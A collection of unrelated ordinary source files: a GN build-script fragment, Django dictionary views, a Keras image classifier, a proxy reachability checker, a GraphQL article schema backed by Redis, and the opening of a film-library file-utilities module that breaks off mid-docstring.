'/DWINVER=0x0A00',
'/D_CRT_SECURE_NO_DEPRECATE',
'/D_SCL_SECURE_NO_DEPRECATE',
'/D_UNICODE',
'/D_WIN32_WINNT=0x0A00',
'/FS',
'/W4',
'/WX',
'/Zi',
'/wd4099',
'/wd4100',
'/wd4127',
'/wd4244',
'/wd4267',
'/wd4505',
'/wd4838',
'/wd4996',
])
cflags_cc.extend([
'/GR-',
'/D_HAS_EXCEPTIONS=0',
])
target_arch = windows_target_build_arch()
if target_arch == 'x64':
ldflags.extend(['/DEBUG', '/MACHINE:x64'])
else:
ldflags.extend(['/DEBUG', '/MACHINE:x86'])
static_libraries = {
'base': {'sources': [
'base/callback_internal.cc',
'base/command_line.cc',
'base/environment.cc',
'base/files/file.cc',
'base/files/file_enumerator.cc',
'base/files/file_path.cc',
'base/files/file_path_constants.cc',
'base/files/file_util.cc',
'base/files/scoped_file.cc',
'base/files/scoped_temp_dir.cc',
'base/json/json_parser.cc',
'base/json/json_reader.cc',
'base/json/json_writer.cc',
'base/json/string_escape.cc',
'base/logging.cc',
'base/md5.cc',
'base/memory/ref_counted.cc',
'base/memory/weak_ptr.cc',
'base/sha1.cc',
'base/strings/string_number_conversions.cc',
'base/strings/string_piece.cc',
'base/strings/string_split.cc',
'base/strings/string_util.cc',
'base/strings/string_util_constants.cc',
'base/strings/stringprintf.cc',
'base/strings/utf_string_conversion_utils.cc',
'base/strings/utf_string_conversions.cc',
'base/third_party/icu/icu_utf.cc',
'base/timer/elapsed_timer.cc',
'base/value_iterators.cc',
'base/values.cc',
], 'tool': 'cxx', 'include_dirs': []},
'gn_lib': {'sources': [
'tools/gn/action_target_generator.cc',
'tools/gn/action_values.cc',
'tools/gn/analyzer.cc',
'tools/gn/args.cc',
'tools/gn/binary_target_generator.cc',
'tools/gn/builder.cc',
'tools/gn/builder_record.cc',
'tools/gn/build_settings.cc',
'tools/gn/bundle_data.cc',
'tools/gn/bundle_data_target_generator.cc',
'tools/gn/bundle_file_rule.cc',
'tools/gn/c_include_iterator.cc',
'tools/gn/command_analyze.cc',
'tools/gn/command_args.cc',
'tools/gn/command_check.cc',
'tools/gn/command_clean.cc',
'tools/gn/command_desc.cc',
'tools/gn/command_format.cc',
'tools/gn/command_gen.cc',
'tools/gn/command_help.cc',
'tools/gn/command_meta.cc',
'tools/gn/command_ls.cc',
'tools/gn/command_path.cc',
'tools/gn/command_refs.cc',
'tools/gn/commands.cc',
'tools/gn/compile_commands_writer.cc',
'tools/gn/config.cc',
'tools/gn/config_values.cc',
'tools/gn/config_values_extractors.cc',
'tools/gn/config_values_generator.cc',
'tools/gn/copy_target_generator.cc',
'tools/gn/create_bundle_target_generator.cc',
'tools/gn/deps_iterator.cc',
'tools/gn/desc_builder.cc',
'tools/gn/eclipse_writer.cc',
'tools/gn/err.cc',
'tools/gn/escape.cc',
'tools/gn/exec_process.cc',
'tools/gn/filesystem_utils.cc',
'tools/gn/function_exec_script.cc',
'tools/gn/function_foreach.cc',
'tools/gn/function_forward_variables_from.cc',
'tools/gn/function_get_label_info.cc',
'tools/gn/function_get_path_info.cc',
'tools/gn/function_get_target_outputs.cc',
'tools/gn/function_mark_used.cc',
'tools/gn/function_mark_used_from.cc',
'tools/gn/function_process_file_template.cc',
'tools/gn/function_read_file.cc',
'tools/gn/function_rebase_path.cc',
'tools/gn/functions.cc',
'tools/gn/function_set_defaults.cc',
'tools/gn/function_set_default_toolchain.cc',
'tools/gn/functions_target.cc',
'tools/gn/function_template.cc',
'tools/gn/function_toolchain.cc',
'tools/gn/function_write_file.cc',
'tools/gn/generated_file_target_generator.cc',
'tools/gn/group_target_generator.cc',
'tools/gn/header_checker.cc',
'tools/gn/import_manager.cc',
'tools/gn/inherited_libraries.cc',
'tools/gn/input_conversion.cc',
'tools/gn/input_file.cc',
'tools/gn/input_file_manager.cc',
'tools/gn/item.cc',
'tools/gn/json_project_writer.cc',
'tools/gn/label.cc',
'tools/gn/label_pattern.cc',
'tools/gn/lib_file.cc',
'tools/gn/loader.cc',
'tools/gn/location.cc',
'tools/gn/metadata.cc',
'tools/gn/metadata_walk.cc',
'tools/gn/ninja_action_target_writer.cc',
'tools/gn/ninja_binary_target_writer.cc',
'tools/gn/ninja_build_writer.cc',
'tools/gn/ninja_bundle_data_target_writer.cc',
'tools/gn/ninja_copy_target_writer.cc',
'tools/gn/ninja_create_bundle_target_writer.cc',
'tools/gn/ninja_generated_file_target_writer.cc',
'tools/gn/ninja_group_target_writer.cc',
'tools/gn/ninja_target_command_util.cc',
'tools/gn/ninja_target_writer.cc',
'tools/gn/ninja_toolchain_writer.cc',
'tools/gn/ninja_utils.cc',
'tools/gn/ninja_writer.cc',
'tools/gn/operators.cc',
'tools/gn/output_conversion.cc',
'tools/gn/output_file.cc',
'tools/gn/parse_node_value_adapter.cc',
'tools/gn/parser.cc',
'tools/gn/parse_tree.cc',
'tools/gn/path_output.cc',
'tools/gn/pattern.cc',
'tools/gn/pool.cc',
'tools/gn/qt_creator_writer.cc',
'tools/gn/runtime_deps.cc',
'tools/gn/scheduler.cc',
'tools/gn/scope.cc',
'tools/gn/scope_per_file_provider.cc',
'tools/gn/settings.cc',
'tools/gn/setup.cc',
'tools/gn/source_dir.cc',
'tools/gn/source_file.cc',
'tools/gn/source_file_type.cc',
'tools/gn/standard_out.cc',
'tools/gn/string_utils.cc',
'tools/gn/substitution_list.cc',
'tools/gn/substitution_pattern.cc',
'tools/gn/substitution_type.cc',
'tools/gn/substitution_writer.cc',
'tools/gn/switches.cc',
'tools/gn/target.cc',
'tools/gn/target_generator.cc',
'tools/gn/template.cc',
'tools/gn/token.cc',
'tools/gn/tokenizer.cc',
'tools/gn/tool.cc',
'tools/gn/toolchain.cc',
'tools/gn/trace.cc',
'tools/gn/value.cc',
'tools/gn/value_extractors.cc',
'tools/gn/variables.cc',
'tools/gn/visibility.cc',
'tools/gn/visual_studio_utils.cc',
'tools/gn/visual_studio_writer.cc',
'tools/gn/xcode_object.cc',
'tools/gn/xcode_writer.cc',
'tools/gn/xml_element_writer.cc',
'util/exe_path.cc',
'util/msg_loop.cc',
'util/semaphore.cc',
'util/sys_info.cc',
'util/ticks.cc',
'util/worker_pool.cc',
], 'tool': 'cxx', 'include_dirs': []},
}
executables = {
'gn': {'sources': [ 'tools/gn/gn_main.cc' ],
'tool': 'cxx', 'include_dirs': [], 'libs': []},
'gn_unittests': { 'sources': [
'tools/gn/action_target_generator_unittest.cc',
'tools/gn/analyzer_unittest.cc',
'tools/gn/args_unittest.cc',
'tools/gn/builder_unittest.cc',
'tools/gn/c_include_iterator_unittest.cc',
'tools/gn/command_format_unittest.cc',
'tools/gn/compile_commands_writer_unittest.cc',
'tools/gn/config_unittest.cc',
'tools/gn/config_values_extractors_unittest.cc',
'tools/gn/escape_unittest.cc',
'tools/gn/exec_process_unittest.cc',
'tools/gn/filesystem_utils_unittest.cc',
'tools/gn/function_foreach_unittest.cc',
'tools/gn/function_forward_variables_from_unittest.cc',
'tools/gn/function_get_label_info_unittest.cc',
'tools/gn/function_get_path_info_unittest.cc',
'tools/gn/function_get_target_outputs_unittest.cc',
'tools/gn/function_process_file_template_unittest.cc',
'tools/gn/function_rebase_path_unittest.cc',
'tools/gn/function_template_unittest.cc',
'tools/gn/function_toolchain_unittest.cc',
'tools/gn/function_write_file_unittest.cc',
'tools/gn/functions_target_unittest.cc',
'tools/gn/functions_unittest.cc',
'tools/gn/header_checker_unittest.cc',
'tools/gn/inherited_libraries_unittest.cc',
'tools/gn/input_conversion_unittest.cc',
'tools/gn/label_pattern_unittest.cc',
'tools/gn/label_unittest.cc',
'tools/gn/loader_unittest.cc',
'tools/gn/metadata_unittest.cc',
'tools/gn/metadata_walk_unittest.cc',
'tools/gn/ninja_action_target_writer_unittest.cc',
'tools/gn/ninja_binary_target_writer_unittest.cc',
'tools/gn/ninja_build_writer_unittest.cc',
'tools/gn/ninja_bundle_data_target_writer_unittest.cc',
'tools/gn/ninja_copy_target_writer_unittest.cc',
'tools/gn/ninja_create_bundle_target_writer_unittest.cc',
'tools/gn/ninja_generated_file_target_writer_unittest.cc',
'tools/gn/ninja_group_target_writer_unittest.cc',
'tools/gn/ninja_target_writer_unittest.cc',
'tools/gn/ninja_toolchain_writer_unittest.cc',
'tools/gn/operators_unittest.cc',
'tools/gn/output_conversion_unittest.cc',
'tools/gn/parse_tree_unittest.cc',
'tools/gn/parser_unittest.cc',
'tools/gn/path_output_unittest.cc',
'tools/gn/pattern_unittest.cc',
'tools/gn/runtime_deps_unittest.cc',
'tools/gn/scope_per_file_provider_unittest.cc',
'tools/gn/scope_unittest.cc',
'tools/gn/setup_unittest.cc',
'tools/gn/source_dir_unittest.cc',
'tools/gn/source_file_unittest.cc',
'tools/gn/string_utils_unittest.cc',
'tools/gn/substitution_pattern_unittest.cc',
'tools/gn/substitution_writer_unittest.cc',
'tools/gn/target_unittest.cc',
'tools/gn/template_unittest.cc',
'tools/gn/test_with_scheduler.cc',
'tools/gn/test_with_scope.cc',
'tools/gn/tokenizer_unittest.cc',
'tools/gn/unique_vector_unittest.cc',
'tools/gn/value_unittest.cc',
'tools/gn/visibility_unittest.cc',
'tools/gn/visual_studio_utils_unittest.cc',
'tools/gn/visual_studio_writer_unittest.cc',
'tools/gn/xcode_object_unittest.cc',
'tools/gn/xml_element_writer_unittest.cc',
'util/test/gn_test.cc',
], 'tool': 'cxx', 'include_dirs': [], 'libs': []},
}
if platform.is_posix():
static_libraries['base']['sources'].extend([
'base/files/file_enumerator_posix.cc',
'base/files/file_posix.cc',
'base/files/file_util_posix.cc',
'base/posix/file_descriptor_shuffle.cc',
'base/posix/safe_strerror.cc',
'base/strings/string16.cc',
])
if platform.is_windows():
static_libraries['base']['sources'].extend([
'base/files/file_enumerator_win.cc',
'base/files/file_util_win.cc',
'base/files/file_win.cc',
'base/win/registry.cc',
'base/win/scoped_handle.cc',
'base/win/scoped_process_information.cc',
])
libs.extend([
'advapi32.lib',
'dbghelp.lib',
'kernel32.lib',
'ole32.lib',
'shell32.lib',
'user32.lib',
'userenv.lib',
'version.lib',
'winmm.lib',
'ws2_32.lib',
'Shlwapi.lib',
])
# we just build static libraries that GN needs
executables['gn']['libs'].extend(static_libraries.keys())
executables['gn_unittests']['libs'].extend(static_libraries.keys())
WriteGenericNinja(path, static_libraries, executables, cc, cxx, ar, ld,
platform, host, options, cflags, cflags_cc, arflags,
ldflags, libflags, include_dirs, libs)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
from django import forms
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render
from swahiliapiapp.models import English, Swahili
class SearchForm(forms.Form):
searchterm = forms.CharField(label="", widget=forms.TextInput(attrs={'placeholder': 'Enter search term here'}))
def index(request):
if request.method == "GET":
return render(request, "swahiliapiapp/index.html", {'words': [], 'form': SearchForm()})
else:
f = SearchForm(request.POST)
if f.is_valid():
searchterm = f.cleaned_data["searchterm"].lower()
return HttpResponseRedirect(f'/en-sw/{searchterm}')
else:
pass
def english_swahili(request, searchterm):
words = English.objects.filter(english_word=searchterm)
return render(request, "swahiliapiapp/index.html", {'words': words, 'form': SearchForm()})
def swahili_english(request, searchterm):
words = Swahili.objects.filter(swahili_word=searchterm)
return render(request, "swahiliapiapp/sw-en.html", {'words': words, 'form': SearchForm()})
|
from keras.models import Sequential, load_model
from keras.layers import Conv2D, Dropout, BatchNormalization, MaxPooling2D,Dense, Activation, Flatten
from keras.optimizers import Adam
from keras.utils import to_categorical
from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping
import os
import glob
import cv2
import numpy as np
from keras.preprocessing.image import load_img
list_classes = os.listdir("../data/train")
image_shape = (150,150,3)
num_classes = 6
def load_data(data_path):
X = []
Y = []
list_classes = os.listdir(data_path)
for class_name in list_classes:
list_img_paths = glob.glob(os.path.join(data_path, class_name) + "/*.jpg")
for img_path in list_img_paths:
img = cv2.imread(img_path)
img = cv2.resize(img, (image_shape[0], image_shape[1]))
img_arr = np.array((img - 127.5) / 127.5)
X.append(img_arr)
Y.append(to_categorical(list_classes.index(class_name),len(list_classes)))
return np.array(X), np.array(Y)
def classification_model(input_shape, num_classes):
model = Sequential()
model.add(Conv2D(filters=8, kernel_size=(3,3), padding='same', activation='relu', input_shape=input_shape))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))
model.add(BatchNormalization())
model.add(Conv2D(filters=16, kernel_size=(3,3),padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))
model.add(BatchNormalization())
model.add(Conv2D(filters=32, kernel_size=(3,3), padding= 'same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2), strides=(2,2)))
model.add(BatchNormalization())
model.add(Conv2D(filters=64, kernel_size=(3,3), padding= 'same', activation='relu'))
model.add(MaxPooling2D(pool_size=(3,3), padding='same'))
model.add(BatchNormalization())
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(3, 3), padding='same'))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dense(500, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
return model
def train(epochs= 500, batch_size = 16):
model = classification_model(input_shape=image_shape, num_classes=num_classes)
optimizer = Adam(learning_rate=0.001)
model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics = ['accuracy'])
trainX, trainy = load_data('../data/train')
valX, valy = load_data('../data/val')
current_checkpoint_subdir = os.listdir('checkpoint')
new_checkpoint_subdir = os.path.join("checkpoint", str(len(current_checkpoint_subdir) + 1))
os.makedirs(new_checkpoint_subdir, exist_ok=False)
current_log_subdir = os.listdir("logs")
new_log_subdir = os.path.join("logs", str(len(current_log_subdir) + 1))
os.makedirs(new_log_subdir, exist_ok=False)
tensorboard = TensorBoard(log_dir=new_log_subdir)
early_stopper = EarlyStopping(monitor='val_accuracy', mode='max', patience=10)
checkpointer = ModelCheckpoint(filepath=os.path.join(new_checkpoint_subdir, "{epoch:03d}-{val_accuracy:.3f}.hdf5"),
monitor='val_accuracy', mode='max', verbose=1,
save_best_only=True)
model.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, validation_data=(valX, valy), callbacks=[tensorboard, early_stopper,checkpointer])
model.save(os.path.join(new_checkpoint_subdir, "model.h5"))
def test():
testX, testy = load_data("../data/test")
model = load_model("checkpoint/1/model.h5")
result = model.evaluate(testX, testy)
print("loss: ", result[0])
print("accuracy: ", result[1])
if __name__ == "__main__":
train(epochs = 30)
#test()
|
#!/usr/bin/env python2
import socket
import sys
def isproxyalive(proxy):
host_port = proxy.split(":")
if len(host_port) != 2:
#sys.stderr.write('proxy host is not defined as host:port\n')
return False
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
try:
s.connect((host_port[0], int(host_port[1])))
except Exception, e:
#sys.stderr.write('proxy %s is not accessible\n' % proxy)
#sys.stderr.write(str(e)+'\n')
s.close()
return False
s.close()
return True
if __name__ == '__main__':
if isproxyalive(sys.argv[1]):
sys.stdout.write('%u' % 1)
else:
sys.stdout.write('%u' % 0)
|
import time
import pickle
import graphene
from graphene import resolve_only_args
from graphene_django import DjangoObjectType, DjangoConnectionField
from graphql_jwt.decorators import login_required
from django_redis import get_redis_connection
from django.db import IntegrityError, transaction
from .models import Article, Likes, TagList, ArticleTag
from .utils import test_article_id, test_id, test_article, get_like, test_tag
class ArticleType(DjangoObjectType):
class Meta:
model = Article
interfaces = (graphene.relay.Node, )
class TagListType(DjangoObjectType):
class Meta:
model = TagList
class ArticleTagType(DjangoObjectType):
class Meta:
model = ArticleTag
class ArticleInfoType(graphene.ObjectType):
body = graphene.Field(ArticleType)
tags = graphene.List(TagListType)
likes = graphene.Int()
class DraftList(graphene.ObjectType):
id = graphene.String()
title = graphene.String()
content = graphene.String()
class AddTag(graphene.Mutation):
ok = graphene.Boolean()
class Arguments:
article_id = graphene.String(required=True)
tag_id = graphene.String(required=True)
@login_required
def mutate(self, info, article_id, tag_id):
user = info.context.user
art_id = test_article_id(article_id)
tg_id = test_id(tag_id)
cn = get_redis_connection()
article_redis = 'article_{}'.format(art_id)
# 测试文章id是否存在
group_object = test_article(cn, art_id)
# 只有作者能给自己的文章加tag
if group_object[0].posted_by.id != user.id:
raise Exception('Only the poster can add tag')
# 测试tag id是否有效
tag_object = test_tag(cn, tg_id)
# 一篇文章只能有一个tag
if tag_object in group_object[1]:
raise Exception('Tag has been added')
# article_id, tag_id全都合格后,先删掉缓存,然后修改mysql,再同步到redis
cn.delete(article_redis)
try:
# 更新articletag表的同时也要更新article表里的更新时间
# 两句sql必须保证原子性,就用了事务
with transaction.atomic():
# tag_name=='NO TAG',是一个无tag的tag,如果添加这个,以前的tag都要删除
if tag_object.name != 'NO TAG':
ArticleTag.objects.create(article_id=art_id, tag_id=tg_id)
pair = ArticleTag.objects.select_related('tag').filter(article_id=art_id)
group_object[1] = {item.tag for item in pair}
else:
ArticleTag.objects.filter(article_id=art_id).delete()
group_object[1] = set()
# save 自动更新 文章的修改时间
group_object[0].save()
cn.set(article_redis, pickle.dumps(group_object))
cn.expire(article_redis, 60 * 30)
ok = True
return AddTag(ok=ok)
except IntegrityError:
# 已经进行过一次重复添加测试,如果还是出现integrity error,说明mysql写入新数据,要重新读取
new_tags = ArticleTag.objects.select_related('tag').filter(article_id=art_id)
group_object[1] = {item.tag for item in new_tags}
cn.set(article_redis, pickle.dumps(group_object))
cn.expire(article_redis, 60 * 30)
raise Exception('Tag has been added')
class LikeArticle(graphene.Mutation):
ok = graphene.Boolean()
class Arguments:
article_id = graphene.String(required=True)
@login_required
def mutate(self, info, article_id):
"""
点赞行为先存在redis,再通过第三方同步到mysql,因为点赞是很频繁的写操作
:param info:
:param article_id:
:return:
"""
# redis里面点赞排行榜是zset,名字是article_like score like member article_id
# 同时需要一个某文章点赞用户的set,来实现一篇文章只能被一个用户点赞一次
# set key vote_of_{article_id} member user_id
user = info.context.user
int_id = test_article_id(article_id)
con = get_redis_connection()
# 先测试文章是否存在
test_article(con, int_id)
# 去重测试
voter_of_redis = 'voter_of_{}'.format(int_id)
if con.sadd(voter_of_redis, user.id):
get_like(con, int_id, vote=True)
ok = True
return LikeArticle(ok=ok)
raise Exception('one article one chance to like')
class CreateArticle(graphene.Mutation):
new_article = graphene.Field(ArticleType)
ok = graphene.Boolean()
class Arguments:
title = graphene.String(required=True)
content = graphene.String(required=True)
create_draft = graphene.Boolean()
draft_id = graphene.String()
@login_required
def mutate(self, info, title, content, create_draft=False, draft_id=None):
if create_draft and draft_id:
raise Exception('do not create and publish draft in one request')
writer = info.context.user
if not create_draft:
# 如果是发布草稿,就要先删掉redis里的备份
con = get_redis_connection()
if draft_id is not None:
draft_redis = 'draft_box_{}'.format(writer.id)
done = con.zremrangebyscore(draft_redis, float(draft_id), float(draft_id))
if not done:
raise Exception('invalid draft id')
try:
with transaction.atomic():
atc = Article(posted_by=writer, title=title, content=content)
atc.save()
Likes.objects.create(id=atc)
article_redis = 'article_{}'.format(atc.id)
con.set(article_redis, pickle.dumps([atc, set()]))
con.expire(article_redis, 60*20)
return CreateArticle(new_article=atc, ok=True)
except IntegrityError:
raise Exception('article already exists')
else:
# 创建草稿箱
con = get_redis_connection()
# 一个用户一个草稿箱
draft_redis = 'draft_box_{}'.format(writer.id)
new_id = time.mktime(time.gmtime(time.time()))
draft = [content, title]
# {value: score}
con.zadd(draft_redis, {pickle.dumps(draft): new_id})
return CreateArticle(ok=True)
class Query(graphene.ObjectType):
Get_all_tags = graphene.List(TagListType)
Get_article = graphene.Field(ArticleInfoType, article_id=graphene.String())
node = graphene.relay.Node.Field()
Get_articles = DjangoConnectionField(ArticleType, description='All the articles')
Get_drafts = graphene.List(DraftList)
@login_required
def resolve_Get_drafts(self, info):
con = get_redis_connection()
draft_redis = 'draft_box_{}'.format(info.context.user.id)
draft_list = con.zrevrange(draft_redis, 0, -1, withscores=True)
result = []
for item, score in draft_list:
pair = pickle.loads(item)
result.append(DraftList(id=score, title=pair[1], content=pair[0]))
return result
@login_required
def resolve_Get_article(self, info, article_id):
con = get_redis_connection()
int_id = test_article_id(article_id)
group_object = test_article(con, int_id)
score = get_like(con, int_id)
return ArticleInfoType(body=group_object[0], tags=group_object[1], likes=score)
@login_required
@resolve_only_args
def resolve_Get_articles(self, **kwargues):
# article_like 文章的点赞sorted set
# score like member article_id
con = get_redis_connection()
if not con.zcard('article_like'):
ranking_list = Likes.objects.select_related().order_by('num')
score_member = {}
for i in range(min(len(ranking_list), 100)):
score_member[ranking_list[i].id.id] = ranking_list[i].num if ranking_list[i].num else 0
article_id = ranking_list[i].id.id
article_redis = '{}_{}'.format('article', article_id)
article = Article.objects.select_related('posted_by').get(id=article_id)
article_tags_object = article.tag_list.select_related('tag').all()
tags_object = {obj.tag for obj in article_tags_object}
group_object = [article, tags_object]
con.set(article_redis, pickle.dumps(group_object))
con.zadd('article_like', score_member)
con.expire('article_like', 60*60*24)
article_list = con.zrevrange('article_like', 0, -1, withscores=True)
result = []
for i, score in article_list:
result.append(test_article(con, i)[0])
return result
@login_required
def resolve_Get_all_tags(self, info):
"""
TagList本来存在mysql中,由于读取文章是在redis中进行,而文章大表没有tag这一栏
所以需要redis里有ArticleTag来存放文章的tag,当我们给文章添加tag时,肯定会修改redis里的articlelist
又因为添加tag,输入的是tag_id,所以如果redis中有tag列表,就可以在O(1)的时间里找到tag对象,而不是花logn去mysql找
:param info:
:return:
"""
# tag_list在redis里是哈希 key tag_list
# field1 tag_id1 value1 pickle.dumps(tag_object1) ....
cn = get_redis_connection()
tag_list_redis = cn.hvals('tag_list')
if tag_list_redis:
return [pickle.loads(tag) for tag in tag_list_redis]
tag_list_mysql = TagList.objects.all()
cn.hmset('tag_list', {tag.id: pickle.dumps(tag)for tag in tag_list_mysql})
return tag_list_mysql
class Mutation(graphene.ObjectType):
Create_article = CreateArticle.Field()
Up_vote = LikeArticle.Field()
Add_tag = AddTag.Field()
|
# -*- coding: future_fstrings -*-
# Copyright 2018 Brandon Shelley. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""File/directory and size utilities for Fylm operations
A collection of class methods that handles file system CRUD operations, like
get, move, rename, and delete. Also includes filesize detector methods.
dirops: directory operations exported by this module.
fileops: file operations exported by this module.
size: file and dir size calculator
"""
from __future__ import unicode_literals, print_function
from builtins import *
import os
import shutil
import sys
import unicodedata
import itertools
from itertools import islice
from multiprocessing import Pool
import fylmlib.config as config
from fylmlib.console import console
from fylmlib.cursor import cursor
import fylmlib.formatter as formatter
class dirops:
"""Directory-related class method operations.
"""
_existing_films = None
@classmethod
def verify_root_paths_exist(cls, paths):
"""Verifies that the specified paths (array) exist.
Loops through an array of paths to check that each one exists. If any do not,
raise an Exception. Primarily used at app initiation time to verify that source
and destination paths are in working order.
Args:
paths: (list) paths to verify existence.
"""
for d in (d for d in paths if not os.path.exists(d)):
console.error(f"'{d}' does not exist; check source path in config.yaml")
@classmethod
def is_same_partition(cls, f1, f2):
"""Determine if f1 and f2 are on the same partition.
Args:
f1: (str, utf-8) path of source file/folder
f2: (str, utf-8) path of destination file/folder
Returns:
True, if f1 and f2 are on the same parition, or force_move is True, else False.
"""
if config.force_move is True:
return True
while not os.path.exists(f1):
f1 = os.path.dirname(f1)
while not os.path.exists(f2):
f2 = os.path.dirname(f2)
return os.stat(os.path.dirname(f1)).st_dev == os.stat(os.path.dirname(f2)).st_dev
@classmethod
def get_existing_films(cls, paths):
"""Get a list of existing films.
Scan one level deep of the target paths to get a list of existing films. Since
this is used exclusively for duplicate checking, this method is skipped when
duplicate checking is disabled.
Args:
paths: (dict) a set of unicode paths to search for existing films.
Must be passed in the form of: { "<quality>": "<path>" }
Returns:
A list of existing Film objects.
"""
# If existing films has already been loaded and the list has
# more than one film:
if cls._existing_films is not None and len(cls._existing_films) > 0:
return cls._existing_films
# Import Film here to avoid circular import conflicts.
from fylmlib.film import Film
# If check_for_duplicates is disabled, we don't care about duplicates, and
# don't need to spend cycles processing duplicates. Return an empty array.
if config.duplicates.enabled is False:
return []
# Fix paths being a str
if isinstance(paths, str):
paths = { 'default': paths }
# Enumerate the destination directory and check for duplicates.
console.debug('Loading existing films from disk...')
cls._existing_films = []
# Map a list of valid and sanitized files to Film objects by iterating
# over paths for 720p, 1080p, 4K, and SD qualities.
for path in list(set(os.path.normpath(path) for _, path in paths.items())):
if os.path.normpath(path) not in config.source_dirs:
xfs = [os.path.normpath(os.path.join(path, file)) for file in cls.sanitize_dir_list(os.listdir(path))]
with Pool(processes=25) as pool:
cls._existing_films += pool.map(Film, xfs)
# Strip bad duplicates
cls._existing_films = list(filter(lambda x: x.should_ignore is False, cls._existing_films))
files_count = list(itertools.chain(*[f.video_files for f in cls._existing_films]))
console.debug(f'Loaded {len(cls._existing_films)} existing unique Film objects containing {len(files_count)} video files')
# Uncomment for verbose debugging. This can get quite long.
# for f in sorted(cls._existing_films, key=lambda s: s.title.lower()):
# console.debug(f' - {f.source_path} {f.all_valid_films}')
# Sort the existing films alphabetically, case-insensitive, and return.
return sorted(cls._existing_films, key=lambda s: s.title.lower())
@classmethod
def get_new_films(cls, paths):
"""Get a list of new potenial films we want to tidy up.
Scan one level deep of the target path to get a list of potential new files/folders.
Args:
paths: (List[str, utf-8]) paths to search for new films.
Returns:
An array of potential films.
"""
# Import Film here to avoid circular import conflicts.
from fylmlib.film import Film
films = []
# Convert to a list if paths is not already (safety check)
if isinstance(paths, str):
paths = [paths]
for path in paths:
# Check if the source path is a single file (usually because of the -s switch)
if len(paths) == 1 and os.path.exists(path) and os.path.isfile(path):
films.append([Film(path)])
break
# Enumerate the search path(s) for files/subfolders, then sanitize them.
# If using the `limit` option, create a sliced list to limit the number of
# files to be processed.
raw_films = islice(cls.sanitize_dir_list(os.listdir(
path)), config.limit if config.limit > 0 else None)
# Map the list to Film objects and extend the films list
films.extend(
list(map(Film, [os.path.join(path, file) for file in raw_films])))
# Sort the resulting list of files alphabetically, case-insensitive.
films.sort(key=lambda x: x.title.lower())
return list(films)
@classmethod
def get_valid_files(cls, path) -> [str]:
"""Get a list valid files inside the specified path.
Scan deeply in the specified path to get a list of valid files, as
determined by the config.video_exts and config.extra_exts properties.
Args:
path: (str, utf-8) path to search for valid files.
Returns:
An array of valid file paths.
"""
# Call dirops.find_deep to search for files within the specified path.
# Filter the results using a lambda function.
valid_files = cls.find_deep(path, lambda x:
# A valid file must have a valid extension
fileops.has_valid_ext(x)
# It must not contain an ignored string (e.g. 'sample')
and not fileops.contains_ignored_strings(x)
# And it must be at least a certain filesize if it is a film,
# or not 0 bytes if it's a supplementary file.
and fileops.is_acceptable_size(x))
# If debugging, print the resulting list of files and sizes.
# This is a very noisy output, so is commented out.
# if config.debug is True:
# import inspect
# for f in list(set(valid_files)):
# console.debug(f'\n`{inspect.stack()[0][3]}`' \
# f' found "{os.path.basename(f)}"' \
# f' ({formatter.pretty_size(size(f))})' \
# f' \nin {path}')
return sorted(valid_files, key=os.path.getsize, reverse=True)
@classmethod
def get_invalid_files(cls, path):
"""Get a list of invalid files inside the specified dir.
Scan deeply in the specified dir to get a list of invalid files, as
determined by the config.video_exts and config.extra_exts properties.
We do not check filesize here, because while we may not want to
rename and move vide/extra files that are too small, we probably
don't want to delete them.
Args:
path: (str, utf-8) path to search for invalid files.
Returns:
An array of invalid files.
"""
# Call dir.find_deep to search for files within the specified dir.
# Filter the results using a lambda function.
return cls.find_deep(path, lambda x:
# An invalid file might contain an ignored string (e.g. 'sample')
fileops.contains_ignored_strings(x)
# Or it may not have a valid file extension
or not fileops.has_valid_ext(x)
# Or if it does, it might not be large enough
or not fileops.is_acceptable_size(x))
@classmethod
def sanitize_dir_list(cls, files):
"""Sanitize a directory listing using unicode normalization and by
omitting system files.
On macOS, unicode normalization must take place for loading files with
unicode chars. This method correctly normalizes these strings.
It also will remove .DS_Store and Thumbs.db from the list, since we
don't ever care to count, or otherwise observe, these system files.
Args:
files: (str, utf-8) list of files in dir.
Returns:
A sanitized, unicode-ready array of files.
"""
return list(filter(lambda f:
not any([f.lower() in map(lambda x: x.lower(), config.ignore_strings)])
and not f.endswith('.DS_Store') and not f.endswith('Thumbs.db'),
[unicodedata.normalize('NFC', file) for file in files]))
@classmethod
def create_deep(cls, path):
"""Deeply create the specified path and any required parent paths.
Using recursion, create a directory tree as specified in the path
param.
Args:
path: (str, utf-8) path to create.
"""
# Because this is a destructive action, we will not create the
# path tree if running in test mode.
if not config.test:
# If the path exists, there's no point in trying to create it.
if not os.path.exists(path):
try:
console.debug(f'Creating destination {path}')
os.makedirs(path)
# If the dir creation fails, raise an Exception.
except OSError as e:
console.error(f'Unable to create {path}', OSError)
@classmethod
def find_deep(cls, root_dir, func=None):
"""Deeply search the specified dir and return all files.
Using recursion, search the specified path for files.
Pass an optional function to filter results.
Args:
root_path: (str, utf-8) path to search for files.
func: (function) user-defined or lambda function to use as a filter.
Returns:
A filtered list of files.
"""
# Use os.walk() to recursively search the dir and return full path of each file.
results = [os.path.join(root, f) for root, dirs, files in os.walk(root_dir) for f in files]
# Sanitize the resulting file list, then call the (optional) filter function that was passed.
return list(filter(func, cls.sanitize_dir_list(results)))
@classmethod
def delete_dir_and_contents(cls, path, max_size=50*1024):
"""Recursively delete dir path and all its contents, if less than max_size.
